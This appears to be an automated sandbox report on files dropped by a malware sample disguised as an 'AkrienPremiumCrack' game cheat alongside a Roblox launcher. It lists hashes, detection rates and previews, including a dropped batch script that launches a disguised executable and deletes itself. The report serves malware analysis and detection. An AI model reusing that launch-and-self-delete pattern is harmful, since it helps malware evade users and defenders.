            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
            MD5:12C61586CD59AA6F2A21DF30501F71BD
            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
            Malicious:false
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
            Process:C:\Browserfont\refdhcp.exe
            File Type:CSV text
            Category:dropped
            Size (bytes):1740
            Entropy (8bit):5.36827240602657
            Encrypted:false
            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpaqZ4x
            MD5:B28E0CCD25623D173B2EB29F3A99B9DD
            SHA1:070E4C4A7F903505259E41AFDF7873C31F90D591
            SHA-256:3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
            SHA-512:17F5FBF18EE0058F928A4D7C53AA4B1191BA3110EDF8E853F145D720381FCEA650A3C997E3D56597150149771E14C529F1BDFDC4A2BBD3719336259C4DD8B342
            Malicious:false
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):163
            Entropy (8bit):4.51262152012362
            Encrypted:false
            SSDEEP:3:YztzMCJ/eH2xyWHf4JWyh2FJ3AENBFVIJthByWHfpPICmGHfpBQA7f/LCRzxo2py:Y19eHwQ4xFJ3vTuJtX9oQDV72VQ
            MD5:BEDBF7D7D69748886E9B48F45C75FBBE
            SHA1:AA0789D89BFBD44CA1BFFE83851AF95B6AFB012C
            SHA-256:B4A55CFD050F4A62B1C4831CA0AB6FFADDE1FE1C3F583917EADE12F8C6726F61
            SHA-512:7DDE268AF9A2C678BE8EC818EA4F12619ECC010CBA39B4998D833602B42DE505D36371393F33709C2ECA788BC8C93634A4FD6BEC29452098DBB2317F4C8847F6
            Malicious:false
            Preview:{"Version":"1.1","Content":{"Headers":[]},"StatusCode":"OK","ReasonPhrase":"OK","Headers":[],"TrailingHeaders":[],"RequestMessage":null,"IsSuccessStatusCode":true}
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):7220
            Entropy (8bit):5.107417667961366
            Encrypted:false
            SSDEEP:96:CcLGgml3nsqj/8YsCm02BXpQdZYqYIhvYsPOcWNCib7HZzeVuSFtJe1g1:Ccjml3ss8Y+XpsZKIZPOvQ67HFi/fes
            MD5:1A9ED330EFD69CE13F823DFE6E8D6951
            SHA1:CC8ED013E0A10925735DCF660A55DB5906041163
            SHA-256:9EA846CB3297FD53D83DCF708FAAA23839A485885853169CB525DAC559C7B486
            SHA-512:E26F41003C30840E5EB8D1ABB39C30C5242D3D7D84E88210DA596F8C4E9FB5C09D9BE76DCD1EBFA761C8207C29E3D14AF583379AE58E0D1DFAF0CD9D6D801515
            Malicious:false
            Preview:{"applicationSettings":{"DFStringHttpInfluxDatabase":"roblox_bootstrapper","FIntBootstrapperLaunchBehaviorABTest":"2","FIntInfluxReportExceptionPermyriad":"10000","UseCdn":"True","FFlagWindowsLaunchTypeAnalytics":"True","FFlagBootstrapperQuitOnDirectXExpiration":"True","FStringDisabledRobloxChannelList":"ZReleaseVS2019,Zfeatureboost_removal_test_in_prod,Zbugfixboost-mutex-revert,zfeaturehsr2cdnplaytest2,Zproject512-boost-remove-mutex-1,Zproject516-boost-remove-mutex-network,Zfeatureinstance-parent-weak-ptr,Zfeaturebaseline,Zfeatureinstance-parent-weak-ptr-2,Zfeaturetelemlife,Zfeaturefmod-20115,ZbugfixCLI-54676-test,Zfeaturesubsystematomic,ZbugfixCLI-55214-master,Zfeatureqt5.15,Zfeatureuse-new-rapidjson-in-flag-loading,Zfeaturefmod-recording-test,Zfeaturesubsystemhttpclient,Zfeaturesignalconcurrency,Zfeatureupgrade-lz4,Zxcode13release,ZQTitanStudioRelease,ZQTitanStudioReleaseHighDpi,Zfeatureprepare-shorelines4,zqtcanary,Zfeatureupgrade-libyuv-bento4,ZfeatureLUATOOLS-121-rbxpMoonbeamRele
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):6010776
            Entropy (8bit):6.32462804770023
            Encrypted:false
            SSDEEP:98304:oSv4ntWoLPv8XcFqnlb3no0Fd7JxngykCN91s/CPUYY+Myu6K:FifLPFqDbjgyjs/C1YHytK
            MD5:442B78765B051E21BCF04E926B87079E
            SHA1:1A22CF8C593231A6963BF2A624BF105420D4DAE9
            SHA-256:4387634FEEB838CBF3156A553FF0914B3CBBC3369A1179A3C6FA57C58B755017
            SHA-512:DA2FB23108D05193776703ADDFAD8887FA8455E5A1DE441FA2A53D1DA6142559F19D1A64910D88643B73A23E12FA09B6CB04F3DF2AA007EDFE0A4ADB8175FEAA
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 0%
            Preview:MZ......................@...................................X...........!..L.!This program cannot be run in DOS mode....$........".vKC.%KC.%KC.%.1.$VC.%.1.$.C.%z.$%IC.%-,$%LC.%.6.$^C.%.6.$PC.%.6.$.C.%.1.$iC.%KC.%PC.%...$dA.%.6.$CC.%.6.$IC.%.6.$.C.%.1.$JC.%.1.$fC.%KC.%wA.%.6.$4C.%.6.$.C.%.6&%JC.%KCN%JC.%.6.$JC.%RichKC.%........................PE..L.....4..........."......j:..........4.......:...@..................................~\...@..................................J.........@6............[..)...........5H.p...................@6H......5H.@.............:..............................text....i:......j:................. ..`.rdata..x8....:..:...n:.............@..@.data.....~...J.......J.............@...CPADinfo(.............V.............@....rsrc...@6.......8....V.............@..@.reloc................X.............@..B........................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):82
            Entropy (8bit):4.485601323077016
            Encrypted:false
            SSDEEP:3:BE5KXp5LGDdN/9DZEHGBUvAAVMiqc:BIo5cdN/9DZu2UvZ7
            MD5:020688DBBE603E5E597E72D363C47E9F
            SHA1:C4DD1970A5FC79C956779BB1C9C3901EB3CED356
            SHA-256:8134540F2D005B02845D4445FE748737A9103D25B152AEED6856703073358E96
            SHA-512:62B603AF381DFF39F3A6848AA27BB3EBAFD4098857A4967C99FF8260887A2D41AB22C51EA9C672B8905C28AA731F0A27CA58841204536EC31B53A0FCA2FEA4D6
            Malicious:false
            Preview:v0..RobloxPlayerLauncher.exe..442b78765b051e21bcf04e926b87079e..6010776..6010776..
            Process:C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe
            File Type:HTML document, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):167
            Entropy (8bit):4.43745738033235
            Encrypted:false
            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLGWbRIwcWWGu:q43tISl6kXiMIWSU6XlI55bRIpfGu
            MD5:0104C301C5E02BD6148B8703D19B3A73
            SHA1:7436E0B4B1F8C222C38069890B75FA2BAF9CA620
            SHA-256:446A6087825FA73EADB045E5A2E9E2ADF7DF241B571228187728191D961DDA1F
            SHA-512:84427B656A6234A651A6D8285C103645B861A18A6C5AF4ABB5CB4F3BEB5A4F0DF4A74603A0896C7608790FBB886DC40508E92D5709F44DCA05DD46C8316D15BF
            Malicious:false
            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>cloudflare</center>..</body>..</html>..
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):83
            Entropy (8bit):4.527855848489682
            Encrypted:false
            SSDEEP:3:BE5KXsiigXLNocwWT5TtklRgHFHQDYsQTUsn:BIlgXL60TEuVsQYsn
            MD5:587AAB2EAB1CD54D3821F17DA6F75117
            SHA1:9D3406D301E9826B4358B6DEE9FA3AABAF3508AA
            SHA-256:4C8AB5DB7C2B45DEB80B9525B2AB4015214756F76654CE598721316ED57D72B8
            SHA-512:EABD2265F56789286489AB876065769CD89EAE848F3DB475B63ECE4CC7E5933C74076B94597B3B9761D6AAFF1427250D32149C8574FECC7E75DF70E549CAFB02
            Malicious:false
            Preview:v0..RobloxPlayerInstaller.exe..cfefb36838560b726b44c5eb64bc55f6..5612440..5612440..
            Process:C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):71
            Entropy (8bit):5.251515605267819
            Encrypted:false
            SSDEEP:3:gRPcBMiXYIJ9wSIwyQVKr/2wX8:gpiIIJpbDVc8
            MD5:7752A528CE6A823C90988B21146AE56F
            SHA1:CD87BAF8C79916B0C05BB365AABA618888B55F46
            SHA-256:2C606599F561A81A07829B2BB22D626CC57D4C856EBED1A743ECDA37F0E31FFD
            SHA-512:2616CC3149182B24B11DFEBA98B95C8A104994048DD15995D891FD4A8AAB0F683CCBA1D1F2027F7BE0954463AB7AC6AAF37B928E886AC0D9EEFB80310CD023AE
            Malicious:false
            Preview:Uptodate<|>$2y$12$KynFldaK.a7uFhslutJMXu50sJt.8rdiNgLlvH1pRUh9QMrLqzvnm
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1545
            Entropy (8bit):4.840470105762514
            Encrypted:false
            SSDEEP:24:uRCLWaO+rvpPj2gM9od/u78CWqkt0JJTqHQwg4FPYP0DOd:QgBO+DpPJMod/u7BWqrq/KWW
            MD5:A410F50F0C11CB176878D011A07C2667
            SHA1:5073F2951E17402DDE44938C49071317475A45F6
            SHA-256:921309BC0C4F5BEFCD3C44362D8898845228063D502A0F6DA2EF48D741547AAD
            SHA-512:F9C89B45A7532F1833B714D79A446A98EA82A7D2B1B3A3A1F582F1232DFE86F81A2B212D28A2D09E1AA45B245792B32DAA9298945BF4A82273A5B7ACBF72622F
            Malicious:false
            Preview:v0..RobloxApp.zip..21f605090ff1fbcde0a532ac69778363..81794159..114217890..content-avatar.zip..b749dd29dc803ae8ad46991f5e1af1b9..396652..1152321..content-configs.zip..8ef21fd079ba958b7dee057b8c6a76bd..90030..625788..content-fonts.zip..c99b86e40e5f8444f2c354b8765b5d05..6780428..13737215..content-models.zip..a94b6d53eea3ae5600fc749c1a0bd8cc..488968..1559324..content-sky.zip..1d0390337d1a4a58e5514be1a9481ad6..2448711..4304365..content-sounds.zip..cd77e0e77d698260809f8ae8b3993740..373629..393784..shaders.zip..37803e446eee6fc031cd3f297ea7d085..9317298..55501832..ssl.zip..43c726b04ccfad6eb95e7ee2c25b33f0..133126..233235..content-textures2.zip..24c19f98d81b49479f07c330ed96be57..9712485..10686532..content-textures3.zip..909f4b9d7bc03a926d35e84d0c99ffbf..3713218..8777652..content-terrain.zip..b4b75c21ce05378163042dc45cec5834..3267..26109..content-platform-fonts.zip..8f379ec2b22ff106b837d79f7fdbf0d8..13686751..16427228..extracontent-places.zip..f1fc58812708be0be15089d46d659e3b..1038899..1464709..
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):119
            Entropy (8bit):4.763774331778645
            Encrypted:false
            SSDEEP:3:YTyLSNLTG5qvqdBtTT8+gEcPMLVX9n:YWLSNEqvqD18+gEACr
            MD5:6307BA5EA757079830A048CA05D29022
            SHA1:94625B729C89C99B7FEC68F80FD7D43A410A5BC2
            SHA-256:4DD63B8E839D53626AF540214059C5C8A4711A257BA8C65C0F7367DAC6D3750E
            SHA-512:3DF23008908E788E80247AF0335BCB93B10DED4A01F4039E070BA19EBBF6AA32EAF27E78E4F3FCFA0A4EFBAC6F7BCE583A7D5BA5A8F811C6D7BEC129262EC457
            Malicious:false
            Preview:{"version":"0.627.0.6270453","clientVersionUpload":"version-d6abc3b106a04c5c","bootstrapperVersion":"1, 6, 0, 6270453"}
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):7484
            Entropy (8bit):5.09879392286895
            Encrypted:false
            SSDEEP:192:Ccjml3ss8Y+XpsZKIZPOvQ67HFi/femqI1Ggo:Ccjss/YFzBIHFl
            MD5:2159EC9662034C5001998FD3EDC80F7E
            SHA1:E37F9D9A270C2E39C631789364C036B6A5E20B64
            SHA-256:86CD357D926D8EF2552ECCAA8C4B7B0680377703276029E9DA7B9C3A388A4E17
            SHA-512:8CB299BADD0B9096EC50F8FC9B4CEC89A257CC81B238EF8612D8ED26800AEB20F980EA3DFE66E3866AB360A4503ADFE589370C4CD07A44F49FC9AA8449B877CA
            Malicious:false
            Preview:{"applicationSettings":{"DFStringHttpInfluxDatabase":"roblox_bootstrapper","FIntBootstrapperLaunchBehaviorABTest":"2","FIntInfluxReportExceptionPermyriad":"10000","UseCdn":"True","FFlagWindowsLaunchTypeAnalytics":"True","FFlagBootstrapperQuitOnDirectXExpiration":"True","FStringDisabledRobloxChannelList":"ZReleaseVS2019,Zfeatureboost_removal_test_in_prod,Zbugfixboost-mutex-revert,zfeaturehsr2cdnplaytest2,Zproject512-boost-remove-mutex-1,Zproject516-boost-remove-mutex-network,Zfeatureinstance-parent-weak-ptr,Zfeaturebaseline,Zfeatureinstance-parent-weak-ptr-2,Zfeaturetelemlife,Zfeaturefmod-20115,ZbugfixCLI-54676-test,Zfeaturesubsystematomic,ZbugfixCLI-55214-master,Zfeatureqt5.15,Zfeatureuse-new-rapidjson-in-flag-loading,Zfeaturefmod-recording-test,Zfeaturesubsystemhttpclient,Zfeaturesignalconcurrency,Zfeatureupgrade-lz4,Zxcode13release,ZQTitanStudioRelease,ZQTitanStudioReleaseHighDpi,Zfeatureprepare-shorelines4,zqtcanary,Zfeatureupgrade-libyuv-bento4,ZfeatureLUATOOLS-121-rbxpMoonbeamRele
            Process:C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):1164347
            Entropy (8bit):6.3732407696299695
            Encrypted:false
            SSDEEP:24576:U2G/nvxW3Ww0tLpTjXIzPkxnXX6WAHOcaiOGdMo:UbA30hXN0b7
            MD5:F01B45525A3718CEEDFCC788392DFE50
            SHA1:60C7511E1D09B5E8E0B206FE23481508C84668DA
            SHA-256:D37AA66005E6123A219328759E079126CE5AD078E0AD72041C7047309DAF0455
            SHA-512:3FEF7E790AD743045BB7140A33780346195C101CFCFB04C44FFB96B34DC455985ACEC13E487E1360FAE73709A9A5FDB300123B3EA9E5979AA88464E59A9E8DC5
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 75%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'...Rich&...................PE..L....._............................@........0....@..........................@............@......................... ...4...T...<....0..........................h"......T............................U..@............0..`...... ....................text............................... ..`.rdata.......0......................@..@.data...(7..........................@....didat....... ......................@....rsrc........0......................@..@.reloc..h".......$..................@..B........................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe
            File Type:PE32+ executable (GUI) x86-64, for MS Windows
            Category:dropped
            Size (bytes):9388032
            Entropy (8bit):7.958837487895641
            Encrypted:false
            SSDEEP:196608:3m7O9QpzcfPkdpnW55tU54pPWxcSp202aoe3B:3CO26Ap74pPsckt
            MD5:830511D481D3B0D9E73F8475159EBEE3
            SHA1:B1E8C1FF729BEE0B8B25030AD93C8076AE455912
            SHA-256:11FF80946D298ED531925658F63FD09DFB3A9D6C4A36CEE57BBE569B9E378BE4
            SHA-512:36286BEBD361D66DC7213DAD9D09B218A98A3CF756D22962C5992ED67B86099C9865A3F7C2B5B240FFEE87EC9C273454314F08DF51410F0F916C38209AB4D199
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 53%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....y.a..........#......r...>................@.......................................... ............................................O.......,...........p....0..............................................0...0...8...............@............................text...lq.......................... ..`.rdata..P...........................@..@.data........ ......................@....pdata..............................@..@_RDATA..............................@..@.akr0.....h.........................`..`.akr1... 9.......:..................`..h.rsrc................>..............@..@................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\RFAwChXSve.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):10172928
            Entropy (8bit):7.994948859417295
            Encrypted:true
            SSDEEP:196608:c5VxEPkreyTNrHxwGtoMC7i2xbsdLKmaHnIdKQLd9/0R:cxZN7eGk7V1sdLugH8R
            MD5:C4546882C186DC99C68501D0DB7FBB21
            SHA1:A1DF487276491F98A4DB7171F397D6A30375EE6D
            SHA-256:45F4D4B64E6A1CA96E51AEC35BEA9BDB72EB950E9810F1CBB95976DBF379089B
            SHA-512:BB340FC4573EF9E0692FA6AF31D8B1751DCBA1C5FE3BB1C0CDB7282316B06C4059D49047E8BBA24E8A6ABC624A4E12AD85FB2C77FCE24A9FCFB4A90E8BF49F89
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D.N.....................(............... ....@..........................0............................................... ..P.................................................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...............................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:ASCII text, with very long lines (1022), with CRLF line terminators
            Category:dropped
            Size (bytes):24189
            Entropy (8bit):5.5359929851911
            Encrypted:false
            SSDEEP:384:AIIyRFcjssp1VGh1vX3FhXuXEvxzGOOxxB7xH/yxPOinpRHT7zBi:AIIi+x1Q/vnFFu0vxzGnxxB7xH/yxPO5
            MD5:225AED4606AA8C67F04AC15586E980BB
            SHA1:25D81D8D194D95D959B5800E7145E020C4C641CD
            SHA-256:BBEBDAB04A8535EC39CD27B1F25A47CA4668291BE9B01039DF8276FDF849B3D9
            SHA-512:2F3A7507773CA92442FE52A5186A5371C3A3287658859E69FA077D2D943A718D80D3CDB5D8574216ABF3EFFE36441CE15F169DFFBAC7ECEFF678985729A96518
            Malicious:false
            Preview:2024-05-31 00:57:07.740 UTC..2024-05-31T00:57:07.009Z,0.009413,0bbc,6 [FLog::Output] RobloxGitHash: cd8f60aa5fd1b833d79957e664b9bd42f71216a2..2024-05-31T00:57:07.023Z,0.023307,0bbc,6 [FLog::Output] Bootstrapper::Bootstrapper..2024-05-31T00:57:07.023Z,0.023361,0bbc,6 [FLog::Output] Bootstrapper::Bootstrapper..2024-05-31T00:57:07.023Z,0.023381,0bbc,6 [FLog::Output] Main threadID 3004..2024-05-31T00:57:07.023Z,0.023405,0bbc,6 [FLog::Output] Start time: 05-31-2024 00:57:07..2024-05-31T00:57:07.023Z,0.023428,0bbc,6 [FLog::Output] installHost: setup.roblox.com..2024-05-31T00:57:07.023Z,0.023446,0bbc,6 [FLog::Output] baseHost: www.roblox.com..2024-05-31T00:57:07.024Z,0.024146,0bbc,6 [FLog::Output] flavor: VANILLA..2024-05-31T00:57:07.024Z,0.024165,0bbc,6 [FLog::Output] The embedded channel is NONE..2024-05-31T00:57:07.024Z,0.024175,0bbc,6 [FLog::Output] BootstrapperClient::BootstrapperClient..2024-05-31T00:57:07.024Z,0.024489,0bbc,6 [FLog::Output] Bootstrapper::parseCmdLine params count = 1..
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:ASCII text, with very long lines (1022), with CRLF line terminators
            Category:dropped
            Size (bytes):8899
            Entropy (8bit):5.523732047763863
            Encrypted:false
            SSDEEP:192:mdW0cMh+726JaJ9Fcjml3szo/7R9p2cjml3sE3jGGri:BHMgyTFcjsszgB2cjssgjjri
            MD5:DEB990C9680A6B1EF88DF1F2F826BAE5
            SHA1:97E0D1DCDCFE198BF123D5608C53B7AE7C4E8326
            SHA-256:EC28C3D8A1F1BA7739FEB68681F6F87900165F877589CE7238D0A5AACF2A7B18
            SHA-512:398ABBEF8044F7D71022B59BD40BEE20DBE64C52C9AF9CE4ADDB4E77F154FD75FBB2AC836D0BA83D748C2FA2A1D2DF6922993F8AC2658F570C7BCCD258524BB4
            Malicious:false
            Preview:2024-05-31 00:57:09.492 UTC..2024-05-31T00:57:09.006Z,0.006059,1c20,6 [FLog::Output] RobloxGitHash: cd8f60aa5fd1b833d79957e664b9bd42f71216a2..2024-05-31T00:57:09.023Z,0.023896,1c20,6 [FLog::Output] Bootstrapper::Bootstrapper..2024-05-31T00:57:09.023Z,0.023969,1c20,6 [FLog::Output] Bootstrapper::Bootstrapper..2024-05-31T00:57:09.023Z,0.023998,1c20,6 [FLog::Output] Main threadID 7200..2024-05-31T00:57:09.024Z,0.024030,1c20,6 [FLog::Output] Start time: 05-31-2024 00:57:09..2024-05-31T00:57:09.024Z,0.024062,1c20,6 [FLog::Output] installHost: setup.roblox.com..2024-05-31T00:57:09.024Z,0.024087,1c20,6 [FLog::Output] baseHost: www.roblox.com..2024-05-31T00:57:09.024Z,0.024950,1c20,6 [FLog::Output] flavor: VANILLA..2024-05-31T00:57:09.025Z,0.025080,1c20,6 [FLog::Output] The embedded channel is NONE..2024-05-31T00:57:09.025Z,0.025098,1c20,6 [FLog::Output] BootstrapperClient::BootstrapperClient..2024-05-31T00:57:09.025Z,0.025345,1c20,6 [FLog::Output] Bootstrapper::parseCmdLine params count = 13.
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):6010776
            Entropy (8bit):6.32462804770023
            Encrypted:false
            SSDEEP:98304:oSv4ntWoLPv8XcFqnlb3no0Fd7JxngykCN91s/CPUYY+Myu6K:FifLPFqDbjgyjs/C1YHytK
            MD5:442B78765B051E21BCF04E926B87079E
            SHA1:1A22CF8C593231A6963BF2A624BF105420D4DAE9
            SHA-256:4387634FEEB838CBF3156A553FF0914B3CBBC3369A1179A3C6FA57C58B755017
            SHA-512:DA2FB23108D05193776703ADDFAD8887FA8455E5A1DE441FA2A53D1DA6142559F19D1A64910D88643B73A23E12FA09B6CB04F3DF2AA007EDFE0A4ADB8175FEAA
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 0%
            Process:C:\Users\user\Desktop\RFAwChXSve.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):6004632
            Entropy (8bit):6.323276318184256
            Encrypted:false
            SSDEEP:98304:/gvtZLOEVA+Wg9S5S6biBgjKzK4LrJgrWteDRCZGFy8JsuWb:A7KEKnm9K8grTCMywsZ
            MD5:938199CA646378B696716037AFC964BA
            SHA1:2D865BFECCF3BADEF2F64E5D6453E6AB71D5F5A7
            SHA-256:2ACC3E0879E4A71A6B08E2D6AF7B238198D2EDA73518B9394D82D00B010C9D7E
            SHA-512:1A37727C5DFAFFA3023845592B400ACC226FACE537176064698B8415D79284B6276FE68BF0E5870DC8898A846F923BD95EAAC1D185613759AD6CA1068456B322
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 0%
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:data
            Category:dropped
            Size (bytes):40
            Entropy (8bit):3.154162526001658
            Encrypted:false
            SSDEEP:3:FkWXlD2lixvYf:9Dwf
            MD5:3E161B359C69D4C77CC2CD408F3125E7
            SHA1:1ABE16055576D5F9E4A6F7551DBD1C1A2966BEA4
            SHA-256:C0737B09478CA97F96E875A861819251B5AD2AB8116968FBECDF498EE2B97971
            SHA-512:E3CBAA00F021E95C344714315D1BD17564391A16A4255A1BD3C95DC33A62AB2FAC7EC9BF46A40C0C3BFE62F7AEF8DEF8C55EB4AA4EA1965357615A32EEF1D2F9
            Malicious:false
            Preview:sdPC.....................gS..bC@.v..b`0z
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):25
            Entropy (8bit):4.403856189774723
            Encrypted:false
            SSDEEP:3:dwN//Lqivn:A//r
            MD5:CC7D36848C7BBEFCDDBE811DCB31F58E
            SHA1:68D6D72F7E950B566096C6EDE09F9BB90A6FBF85
            SHA-256:E7D27BD42D2ABE4F6D6F44ECDAE96667C5FA3BA1FAE6DDCE3281062F8D6F03D1
            SHA-512:1E253C3AAE00DD07D9707B2D0DBEBECA5055319ABFA90FA2A342CC50E797C79125AD7F877D76903A0AB8C71991998A180AAFA4A74B5CF6E516E0FC6819F189A8
            Malicious:false
            Preview:xTfaIUHZa3Hdvtg4FAOPMn6EO
            Process:C:\Browserfont\refdhcp.exe
            File Type:DOS batch file, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):195
            Entropy (8bit):5.060945349165783
            Encrypted:false
            SSDEEP:6:hITg3Nou11r+DE1aHvQ+yKOZG1wkn23ffGRHn:OTg9YDEyof2RHn
            MD5:EB6705CD5685EC9F698E186A6C0F1832
            SHA1:D7BFD214F8027F8F5B18EB59688AEA864BFBFF0C
            SHA-256:C1C19625FAF828780DC11988F366FA1FBD95A2E7B322378A6AAA36CB44D49BCF
            SHA-512:54B5745A354FFA67414558ADE9E07B84785E63594A822E909CD2F64AA646A3A8877D141EA8446691D50BC1BA69DC7E069DD2332043C196218769B95CB3980922
            Malicious:false
            Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Users\Public\Videos\cmd.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\xmPWAq47dS.bat"
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (758), with no line terminators
            Category:dropped
            Size (bytes):758
            Entropy (8bit):5.891138077470593
            Encrypted:false
            SSDEEP:12:VI4GIKhUfP1oEpl0lmV8zgocNtfO2oIiApIX3Kcyya9JHY+/a6izl7nRUaR1ZoJZ:1GnQGEksflpU3KcyyaJZi6IRUaR10hi8
            MD5:EBFDA04FD507220A8ADF0959AE481619
            SHA1:D8D6CDB2C4D9E81E4122CE2BF931BF14F2BA7C1E
            SHA-256:108A7252CCBE0B5EEFAB01A2C953BA002FB7414D67871D06091906754738B8D0
            SHA-512:1F0250BE86CDAFE69F9C2A549BF44A1962B2755EDA0671BD704BD3595F0E3894F61FABC9CF6650BAA31F1E63591DF042DDC5D4943923148901FD2E80355536C5
            Malicious:false
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
